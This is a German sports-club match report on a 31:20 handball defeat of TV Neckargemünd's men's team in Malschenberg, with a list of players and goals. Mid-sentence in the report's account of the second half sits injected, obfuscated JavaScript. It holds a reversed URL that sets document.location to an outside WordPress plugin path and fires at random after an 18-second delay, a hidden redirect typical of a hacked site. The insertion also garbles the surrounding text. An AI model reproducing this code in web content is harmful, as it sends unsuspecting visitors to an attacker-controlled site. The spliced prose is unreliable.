Herren I: nach katastrophaler Leistung auch in der Höhe verdient verloren!

“Harmlos, harmloser, TVN“ so kann man kurz und prägnant das Angriffs- und Abwehrverhalten beschreiben, das unsere erste Männermannschaft am Sonntag in Malschenberg an den Tag gelegt hat.
Neckargemünd, 30.10.2013 (tur) – Wir können uns nur bei unseren Torhütern und der schlechten Chancenauswertung unseres Gegners bedanken, dass aus der hohen Niederlage nicht ein Debakel wurde.Zum Spielverlauf: nach gutem Start (4:2 Führung nach 8 Minuten) übernahm Malschenberg mehr und mehr das Ruder und konnte bis zur Halbzeit seine Führung auf 11:8 ausbauen. Was dann in den zweiten 30 Minuten ablief, kann nur als toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}totaler Blackout des TVN bezeichnet werden. Technische Fehler, verschossene Bälle, statisches Angriffspiel ohne Durchsetzungskraft und in der Abwehr wurde das “körperlose“ Spiel für den Handball erfunden, das war das Spiel des TVN in der zweiten Halbzeit! So konnte sich der Gastgeber kontinuierlich bis zum Endstand von 31:20 absetzen und das ohne sich besonders anstrengen zu müssen.

Am Ende musste man noch mit Höhe der Niederlage zufrieden sein, da uns an diesem Tag durchaus Schlimmeres gedroht hätte, wenn der TSV mit seiner Vielzahl an Chancen konsequenter umgegangen wäre. Uns allen war es von Anfang an bewusst, dass es diese junge Truppe nicht leicht haben wird, nur kann es nicht sein, dass man sich als Mannschaft so hängen lässt und sich seinem Schicksal so widerstandslos ergibt! Wir haben also noch viel zu tun…packen wir’s an! Am besten mit einer starken Leistung beim nächsten Spiel in Steinsfurt (03.11.).

Es spielten:

Im Tor: Estl, Ferber

Im Feld: Hünnerkopf 4, Sendelbach 1, Rupp 1, Papst 2, Heinze 1, Lichtl, Thieme 2, Zatrieb, Herd 9/3, Kronbichler